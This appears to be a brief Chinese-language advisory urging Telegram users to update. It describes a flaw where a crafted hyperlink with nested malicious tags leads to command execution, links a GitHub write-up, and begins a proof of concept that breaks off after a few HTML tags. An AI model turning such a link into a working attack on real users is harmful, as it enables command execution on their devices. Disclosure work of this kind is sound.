Telegram 是啥不多说:看到了的赶紧更新吧。 详情看GitHub:https://github.com/Metnew/telegram-links-nsworkspace-open 给你发送一个超链接,包含恶意嵌套代码标签,导致命令执行。 POC 如下: <html> </head> <!--<me...